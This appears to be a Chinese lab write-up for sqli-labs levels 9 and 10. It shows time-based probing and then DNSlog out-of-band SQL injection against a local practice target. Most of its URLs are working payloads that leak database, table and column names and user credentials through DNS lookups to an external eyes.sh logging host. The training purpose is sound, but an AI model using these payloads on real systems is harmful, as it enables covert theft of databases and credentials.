sqli-labs靶场less-9和less-10

子非鱼9992024-10-08 21:05

sqli-labs靶场less-9

本文只展示如何利用dnslog注入通过本关,注入原理可以参考我另外一篇文章

DSNlog注入原理

1、确定闭合方式

http://192.168.140.130/sq/Less-9/?id=1

发现id的值不论为任何值,页面回显都是一致的You are in...

判断不存在布尔注入,报错注入

用dnslog注入,构造1' and sleep(2) --+确定闭合方式

可以将单引号修改为",'),')),"),"))等,查看页面回显时间,最终确定语句为

http://192.168.140.130/sq/Less-9/?id=1' and sleep(2) --+

页面回显延迟,确定闭合方式为' '

2、平台选取

打开网址 https://eyes.sh/login ,注册账号

也可以使用其他平台,更多平台可以参考我上面提到的连接

登入进去

3、dnslog注入

构造语句

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select database()),'.zifei.eyes.sh/test.txt'))) --+

concat是为了将里面的值拼接起来

zifeiyu.eyes.sh是自己在eses.sh中注册

查看网页得到数据库名

数据库版本

爆出所有数据库

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 0,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 1,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 2,1),'.zifei.eyes.sh/test.txt'))) --+

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select schema_name from information_schema.schemata limit 3,1),'.zifei.eyes.sh/test.txt'))) --+

此处图片只列举一些

爆出security的所有表

  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 1,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 2,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select table_name from information_schema.tables where table_schema=database() limit 3,1),'.zifei.eyes.sh/test.txt'))) --+

爆出列名

  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 0,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),'.zifei.eyes.sh/test.txt'))) --+
  • http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select column_name from information_schema.columns where table_schema=database() and table_name='users' limit 1,1),'.zifei.eyes.sh/test.txt'))) --+

爆出数据

http://192.168.140.130/sq/Less-9/?id=1' and (select load_file(concat('//',(select concat(username,'.',password) from security.users limit 0,1),'.zifei.eyes.sh/test.txt'))) --+

只需要修改0的值,便可以得到所有的值

less-10

本关与第九关用dnslog通过方式一样,只不过闭合方式为";其他一致

相关推荐
明月看潮生1 小时前
青少年编程与数学 02-007 PostgreSQL数据库应用 15课题、备份与还原
数据库·青少年编程·postgresql·编程与数学
明月看潮生1 小时前
青少年编程与数学 02-007 PostgreSQL数据库应用 14课题、触发器的编写
数据库·青少年编程·postgresql·编程与数学
桂月二二4 小时前
探索前端开发中的 Web Vitals —— 提升用户体验的关键技术
前端·ux
hunter2062065 小时前
ubuntu向一个pc主机通过web发送数据,pc端通过工具直接查看收到的数据
linux·前端·ubuntu
qzhqbb5 小时前
web服务器 网站部署的架构
服务器·前端·架构
加酶洗衣粉5 小时前
MongoDB部署模式
数据库·mongodb
刻刻帝的海角5 小时前
CSS 颜色
前端·css
Suyuoa5 小时前
mongoDB常见指令
数据库·mongodb
添砖,加瓦5 小时前
MongoDB详细讲解
数据库·mongodb
Zda天天爱打卡5 小时前
【趣学SQL】第二章:高级查询技巧 2.2 子查询的高级用法——SQL世界的“俄罗斯套娃“艺术
数据库·sql
热门推荐
01centos7 init.d 和system.d02Dell服务器升级ubuntu 22.04失败解决03半导体应用系统一些小知识收集(strip&wafer mapping,EAP&scada)04PyTorch AMP 混合精度中grad_scaler.py的scale函数解析05Windows10安装PCL1.14.0及点云配准06密码学原理技术-第六章-introduction to pulibc-key cryptography07xgboost: Why not implement distributed XGBoost on top of spark08Oracle Scheduler: Calendaring09(欧拉)openEuler系统添加网卡文件配置流程、(欧拉)openEuler系统手动配置ipv6地址流程、(欧拉)openEuler系统网络管理说明10大语言模型LLM的文生图、文生视频和文生语音技术简介